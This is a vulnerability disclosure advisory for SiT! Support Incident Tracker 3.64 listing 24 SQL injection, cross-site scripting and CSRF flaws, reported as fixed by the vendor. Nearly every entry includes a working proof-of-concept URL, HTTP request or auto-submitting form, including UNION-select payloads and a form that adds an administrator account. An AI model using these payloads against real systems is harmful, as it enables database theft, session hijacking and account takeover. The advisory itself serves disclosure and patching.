Vulnerability ID: HTB23043 Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.html Product: SiT! Support Incident Tracker Vendor: The Support Incident Tracker Project ( http://sitracker.org/ ) Vulnerable Version: 3.64 and probably prior Tested Version: 3.64 Vendor Notification: 24 August 2011 Vulnerability Type: SQL Injection, XSS, CSRF Status: Fixed by Vendor Risk level: High Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details: High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks. 1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following PoC code is available: http://[host]/portal/kb.php?start=SQL_CODE_HERE 2) Input passed via the "contractid" GET parameter to contract_add_service.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following PoC code is available: http://[host]/contract_add_service.php?contractid=1%20union%20%28select%20min%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2B1%29%2%29%29%29%20+--+ 3) Input passed via the "mode" GET parameter to contact_support.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: http://[host]/contact_support.php?mode=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 4) Input passed via the "contractid" GET parameter to contract_add_service.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: http://[host]/contract_add_service.php?contractid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 5) Input passed via the "user" GET parameter to edit_backup_users.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: http://[host]/edit_backup_users.php?user=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 6) Input passed via the "id" GET parameter to edit_escalation_path.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following PoC code is available: http://[host]/edit_escalation_path.php?id=-1%20union%20select%201,version%28%29,user%28%29,4,5,6,7,8,9 7) Input passed via the "id" GET parameter to edit_escalation_path.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: http://[host]/edit_escalation_path.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 8) Input passed via the Referer parameter to forgotpwd.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: GET /forgotpwd.php?userid=1&action=sendpwd HTTP/1.1 Referer: '<script>alert(document.cookie);</script> 9) Input passed via the "unlock" & "lock" GET parameters to holding_queue.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following PoC code is available: http://[host]/holding_queue.php?unlock=%27SQL_CODE_HERE http://[host]/holding_queue.php?lock=%27SQL_CODE_HERE 10) Input passed via the "selected" POST parameter to holding_queue.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following PoC code is available: <form action="http://[host]/holding_queue.php"; method="post"> <input type="hidden" name="selected[]" value="'SQL_CODE_HERE"> <input type="submit" value="exploit"> </form> 11) Input passed via the "action" GET parameter to inbox.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: http://[host]/inbox.php?action=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 12) Input passed via the "search_string" GET parameter to incident_add.php (when "action" is set to "findcontact") is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: http://[host]/incident_add.php?action=findcontact&search_string=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 13) Input passed via the "inc" POST parameter to report_customers.php (when "mode" is set to "report") is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following PoC code is available: <form action="http://[host]/report_customers.php?mode=report"; method="post"> <input type="hidden" name="inc[]" value="-1) union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 -- "> <input type="hidden" name="output" value="screen"> <input type="submit" value="exploit"> </form> 14) Input passed via the "table1" POST parameter to report_customers.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: <form action="http://[host]/report_customers.php"; method="post"> <input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>"> <input type="submit" value="exploit"> </form> 15) Input passed via the "table1" POST parameter to report_incidents_by_engineer.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: <form action="http://[host]/report_incidents_by_engineer.php"; method="post"> <input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>"> <input type="submit" value="exploit"> </form> 16) Input passed via the "table1" POST parameter to report_incidents_by_site.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: <form action="http://[host]/report_incidents_by_site.php"; method="post"> <input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>"> <input type="submit" value="exploit"> </form> 17) Input passed via the "inc" POST parameter to report_incidents_by_site.php (when "mode" is set to "report") is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following PoC code is available: <form action="http://[host]/report_incidents_by_site.php?mode=report"; method="post"> <input type="hidden" name="inc[]" value="-1) union select version(),2,3,4,5,6,7,8,9,10 -- "> <input type="hidden" name="output" value="screen"> <input type="submit" value="exploit"> </form> 18) Input passed via the "startdate" & "enddate" GET parameters to report_incidents_by_vendor.php (when "mode" not empty) is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: http://[host]/report_incidents_by_vendor.php?mode=1&startdate=%3Cscript%3Ealert%281%29;%3C/script%3E&enddate=%3Cscript%3Ealert%282%29;%3C/script%3E 19) Input passed via the "table1" POST parameter to report_marketing.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: <form action="http://[host]/report_marketing.php"; method="post"> <input type="hidden" name="table1" value="'><script>alert(document.cookie);</script>"> <input type="submit" value="exploit"> </form> 20) Input passed via the "start" GET parameter to search.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following PoC code is available: http://[host]/search.php?q=123&domain=incidents&start=SQL_CODE_HERE 21) Input passed via the "sites" GET parameter to transactions.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following PoC code is available: http://[host]/transactions.php?sites[]=1%20union%20select%201,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14,15,16%20+--+ 22) Input passed via the Referer parameter to billable_incidents.php (when "mode" is set to "approvalpage" & "output" is set to "html") is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: GET /billable_incidents.php?mode=approvalpage&output=html HTTP/1.1 Referer: '><script>alert(document.cookie);</script> 23) Input passed via the Referer parameter to transactions.php (when "display" is set to "html") is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user browser session in context of affected website. The following PoC code is available: GET /transactions.php?display=html HTTP/1.1 Referer: '><script>alert(document.cookie);</script> 24) The application allows users to perform certain actions via HTTP requests without making proper validity checks to verify the requests. This can be exploited to e.g. change administrator email, add new new administrator or conduct script insertion attacks by tricking an administrator into visiting a malicious web site while being logged-in to the application. The following PoC is available: <form action="http://[host]/user_profile_edit.php"; method="post"> <input type="hidden" name="realname" value="realname"> <input type="hidden" name="mode" value="save"> <input type="hidden" name="submit" value="Save"> <input type="hidden" name="email" value="testem...@test.com"> <input type="hidden" name="userid" value="1"> <input type="submit" id="btn"> </form> <script> document.getElementById('btn').click(); </script> <form action="http://[host]/user_add.php"; method="post"> <input type="hidden" name="realname" value="testuser"> <input type="hidden" name="username" value="testuser"> <input type="hidden" name="password" value="password"> <input type="hidden" name="groupid" value="0"> <input type="hidden" name="roleid" value="1"> <input type="hidden" name="jobtitle" value="jobtitle"> <input type="hidden" name="email" value="em...@email.com"> <input type="hidden" name="submit" value="Add User"> <input type="submit" id="btn"> </form> <script> document.getElementById('btn').click(); </script> -------------------------------- Solution: Upgrade to the most recent version
